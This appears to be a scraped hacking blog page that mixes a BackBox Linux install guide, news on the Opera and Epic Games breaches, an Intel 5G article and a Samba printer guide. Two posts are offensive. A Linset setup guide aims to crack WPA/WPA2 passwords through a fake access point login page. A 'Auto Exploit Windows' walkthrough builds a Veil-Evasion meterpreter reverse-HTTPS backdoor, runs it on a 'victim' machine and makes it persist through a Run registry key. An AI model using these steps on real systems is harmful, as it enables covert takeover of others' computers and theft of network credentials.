Install BackBox Linux 4.3

Introduction about BackBox
BackBox is more than an operating system, it is a Free Open Source Community project with the aim to promote the culture of security in IT environment and give its contribute to make it better and safer. All this using exclusively Free Open Source Software by demonstrating the potential and power of the community. If you'd like to know more feel free to navigate in our web site and get in touch with us.
Features in BackBox Linux 4.3
This new release is basically a maintainance release, which means that most of the updates are bug fixes, however, development team has managed to add some exciting features as well. Some of them are listed below:
  • It uses lightweight desktop environment xfce, and linux kernel 3.16.
  • Upgraded version of Ruby.
  • LVM and full disk encryption features have been added in the installer.
  • Integration of the upstream components.
  • Following new tools have been added to the operating system.
  • beef-project
  • btscanner
  • dirs3arch
  • metasploit-framework
  • ophcrack
  • setoolkit
  • tor
  • weevely
  • wpscan
Install BackBox Linux 4.3
Download backBox
Burn Iso BackBox on DVD or Flashdrive
Whichever method you choose, here is the very first screen you should see when booting your system using this ISO. you need select for the first booting to iso BackBox.
And this is the first screen if you choose the correct initial boot
 



 Let it boot into the live environment, here click on “Install Backbox Linux”

 

Choose your preferred language for the installation.


 It will verify that all requirements to install new OS are fulfilled.

Next steps you need choose method install BackBox of steps partition. The default option will erase disk and reinstall fresh OS on it, it should work for most of us, but if you are looking to perform custom disk partitioning, you can do it from this step. Click “Install Now” to proceed further. But this will delete all data on your harddisk.

 Select your location from this step.

 Choose your keyboard layout from here.
 Specify your login details for the  new installation. And you must remember what you do here. Due to enter into backbox after installation requires data that you make.

 That's it, the installation is in progress now. relaxed and installation may take several minutes.
 Then finish. your Operating System like my OS.

Conclusion

It is an operating system that is very useful for testing a wide range of applications from all categories ranging from the web to the network. You can use it for something Hacking. such a network, LAN, wifi, and other websites.
 

Related Posts:

Opera Browser Sync Service Hacked, Users Data and Saved Password Compromised



Opera has reset passwords of all users for one of its services after hackers were able to gain access to one of its Cloud servers this week.

Opera Software reported a security breach last night, which affects all users of the sync feature of its web browser.

So, if you’ve been using Opera’s Cloud Sync service, which allows users to synchronize their browser data and settings across multiple platforms, you may have hacked your passwords, login names, and other sensitive data.
Opera confirmed its server breach on Friday, saying the "attack was quickly blocked" but that it "believe some data, including some of [their] sync users’ passwords and account information, such as login names, may have been compromised."
Opera has around 350 Million users across its range products, but around 1.7 Million users using its Sync service had both their synchronized passwords as well as their authentication passwords leaked in the hack.

Since the company has already reset passwords of all of its registered Opera Sync users and emailed them with details, you need not worry about your account.
"Although we only store encrypted (for synchronized passwords) or hashed and salted (for authentication) passwords in this system, we have reset all the Opera sync account passwords as a precaution," Opera Software explained in a blog post.
Additionally, the company has also informed all Opera Sync users about the security breach and recommended them to change passwords for their Opera Sync accounts as soon as possible. You can obtain a new password for Opera sync using the password resetting page.

The complete details about the intrusion and extent of the breach are yet unknown.

Opera Software encouraged users to reset passwords for any third party websites they may have synced with its service.

However, if you are the one using the same password for multiple sites, you are also advised to change your passwords for those sites manually.

Since we’ve repeatedly seen folks reusing passwords across multiple services with recent high-profile account hacking, you are advised to use a good password manager always to keep a strong, unique password for your online accounts.

We have listed some best password managers that would help you understand the importance of password managers and choose a suitable one according to your requirement.

Related Posts:

Install Linset Kali Linux Rolling 2016

As we know Linset is bash script that can use to hacking wpa/wpa2 password without brute force. In the next tutorial we will show How to crack WPA and WPA2 Wireless Networks using Linset on Kali Linux.
We can hack wpa/wps2 password without wordlist.
how linset is made in accordance fake Access Point. the user will be redirected to a login page where the user will fill in the correct password to login page.
Download LINSET 4Shared



Then i will show you how Install Linset On Kali Linux Rolling 2016.


Change a Repository kali Linux Rolling 2016
Update Your Kali Linux
#apt-get update

Install isc-dhcp-server
# apt-get install isc-dhcp-server
Install php7.0-cgi
# apt-get install php7.0-cgi

Install hostapd
# apt-get install -y hostapd

For install lighttpd you can download in here


Extrack and open with terminal
# ls
# ./configure

Install lighttpd
# sudo make install

Then finish.
You can use it
thnks.. :)


Visit more page about Hacking WPA2 Using Linset

Related Posts:

Epic Games Forum Hacked, Once Again — Over 800,000 Gamers' Data Stolen

http://learninghacker16.blogspot.co.id/2016/08/epic-games-forum-hacked-once-again-over.html
If you are a fan of Unreal Tournament from Epic Games or ever have participated in discussions on the online forums run by Epic Games, you possibly need to change your forum password as soon as possible.

It seems the Unreal Engine and its creators, Epic Games' forums have recently been compromised by an unknown hacker or a group of hackers, who have stolen more than 800,000 forum accounts with over half a Million from the Unreal Engine's forums alone.

The hackers get their hands on the forum accounts by exploiting a known vulnerability resided in an outdated version of the vBulletin forum software, which allowed them to get access to the full database.

Epic believes registration information that includes usernames, scrambled passwords, email addresses, dates of birth, IP addresses, and date of joining, may have been obtained in the attack.
"We believe a recent Unreal Engine and Unreal Tournament forum compromise revealed email addresses and other data entered into the forums, but no passwords in any form, neither salted, hashed, nor plaintext," announcement on the Unreal Engine forum website reads.
However, ZDNet reports "their full history of posts and comments including private messages, and other user activity data from both sets of forums" have also been compromised.

Most of the stolen passwords are scrambled that can not be cracked easily, but hackers could exploit other stolen data to send phishing messages to forum members' email addresses in an effort to infect their systems with ransomware or other malicious software.

Epic Game Players at Risk


Moreover, there is bad news for players of Infinity Blade, UDK, Gears of War, and older Unreal Tournament games, as hackers may have compromised their salted hashed passwords, along with their email addresses and other data entered into the forums.

At the time of writing, the Epic Games' forum and Unreal Engine forums both appeared to be down.

So, users are advised to change their passwords for the forum accounts as soon as possible and keep a longer and stronger one this time and change passwords for other online services, especially if you use the same password for multiple sites.

You can use a good password manager that allows you to create complex passwords for different sites and remember them for you.

We have listed some best password managers that could help you understand the importance of password manager and help you choose a suitable one, according to your requirement.

LeakedSource, a search engine site that indexes leaked login credentials from data breaches, has added the breached data from the Epic Games' forums into its database, which includes the password hashes to allow its users to search for their stolen data.

Related Posts:

Intel sees 5G networks as opportunity to sell more server chips

http://learninghacker16.blogspot.co.id/2016/08/intel-sees-5g-networks-as-opportunity.html

Intel is getting behind the development efforts for the upcoming next-generation 5G networks, but not perhaps in the way that might be imagined. Rather than the wireless network itself, Intel’s focus is on the back-end infrastructure to support this, which it sees as a great opportunity for its processors and other datacentre technology.
At its annual Intel Developer Forum (IDF) event in San Francisco, the firm discussed its vision for a 5G world, where mobile networks will be much more than just a technology for making phone calls and will instead serve a bewildering array of devices – such as sensors connected up via the internet of things (IoT), autonomous vehicles, and other network-enabled infrastructure.
“If you look at 5G, we view it as the age of the machines, and everything that enables a fully mobile, connected, intelligent society,” said Asha Keddy, vice-president in Intel's mobile and communications group and general manager of the company's standards and advanced technology team.
For this reason, 5G is proving a harder nut to crack than earlier mobile standards, because it will have to serve a wide array of use cases, from connecting billions of small low-power sensors to low-latency streaming of high definition video, to users with tablets or smartphones – and almost certainly some applications that have not been thought of yet.
“We don’t know what the future will look like. If you look back to 2G networks, it was all about phones and voice, and then we started having the data revolution. By the time we were rolling out LTE [4G networks], we started requiring things that hadn’t been planned for when LTE was originally designed,” added Keddy.
Initially, 5G networks are likely to be made up of multiple wireless technologies, including new air interfaces operating at millimetre wavelengths with data rates measured in gigabits per second, and with the aim of keeping latency down to below 1ms for an end-to-end round trip delay.
However, while the exact standards are still a work in progress, AT&T senior vice-president for wireless network architecture Tom Keathley said that he expected to see some early pre-standard deployments as soon as next year, with full roll-outs slated for some time following 2020.
Unlike earlier generations of mobile network technology, 5G will be built upon infrastructure making extensive use of technologies such as software-defined networking (SDN), network function virtualisation (NFV), and advanced data analytics. These will be required to enable a service model that can slash the cost of carrying the huge volumes of data that are expected to be generated by billions of connected devices and more widespread use of high-definition video, according to Intel.
“One of the things that is important to keep in mind for 5G is that the backhaul network, from the base station back into the core, is already in a transformation, and this is because, as those devices have more and more data passing through them, the network itself has to transform,” said Lynn Comp, director of market development at Intel’s network products group.
Not surprisingly, Intel sees this an opportunity, as it has been putting much development effort over the past few years behind SDN and NFV initiatives, as well as working to optimise its processors for handling analytics workloads.
But it is not just in the cloud or datacentre, Intel’s traditional area of expertise. The firm is now talking about the need to have intelligence distributed throughout the network, and especially at the network edge, to support some expected use cases for 5G networks.
“What you’re seeing is cloud-like capabilities going from the datacentre, into the network and out to the edge, helping to process and add intelligence and insights about what data should go where,” said Comp.
The need for this will be driven by applications where a rapid response is called for, according to Intel. For example, when monitoring industrial processes or controlling autonomous vehicles, sending all the data back to a remote datacentre for analysis may simply cause too much of a delay. Having some local analytics capability would be a better solution.
If Intel is right, then processing power is not going to be concentrated inside mega datacentres operated by the major cloud providers, but will be spread across the network with base stations and other nodes becoming miniature datacentres in their own right, perhaps caching content locally to cut latency. And naturally, this will also see more Intel chips being sold.

Related Posts:

Auto Exploit Windows Using Powershell


 



Auto exloit is a backdoor created in metasploit which will remain open despite the victim's computer is shut down or restarted. many uses of auto exploit, one of them is meterpreter new session will open when the victim computer is turned on, making it easier to process in a computer hacking victim.
we will inject registry victim using powershell. powershell payload created using the veil-evasion.



First open Veil-Evasion. with ./Veil-Evasion.py


 Select powershell/meterpreter/rev_https. type use 23
Check your local ip. With type ifconfig
set LHOST "Your Local IP". exsample = set LHOST 192.168.10.211
Set LPORT 9999
info
Generate and create name with backdoor
Press enter

Open metasploit with type msfconsole in terminal

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST "Your Local IP". exsampe= set LHOST 192.168.10.211
set LPORT 9999
exploit
Copy backdoor.bat on victim. And run backdoor.bat on victim machine.
Meterpreter session Opened
You can see the location backdoor.bat on the Desktop victim. and if you want to put backdoor.bat in another folder that is not a problem.
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurentVersion\\Run -v 9999 -d "location a backdoor.bat"
exsample = reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurentVersion\\Run -v 9999 -d c:\\Users\\HRD-Andim\\Desktop\\backdoor.bat
You can check on registry victim machine. you create folder on victim machine with name 9999
reg queryval -k  HKLM\\Software\\Microsoft\\Windows\\CurentVersion\\Run -v 9999
Restart the victim machine. and mesterpreter session 2 will be opened.
Then finish.  backdoor will always be open despite the victim turning off his computer

Thanks.. :)



Related Posts:

Sharing Printer Ubuntu 12.04





This quick tutorial is going to show you how to share Printer a wired printer in Ubuntu 14.04 Trusty over local network.

 Sudo nano /etc/samba/smb.conf
change wins support = yes 
change security = share
change guest ok = yes
save the smb.conf
 Enable shared
 sudo apt-get install samba
 sudo apt-get install smbfs
 Check ip address ubuntu
On windows open Run . Type \\192.168.10.93 ( Ip Address Your Ubuntu)
Connect The Printer
 Connecting
 Select Printer
Print Test Page
 Finish..!! Success

Related Posts: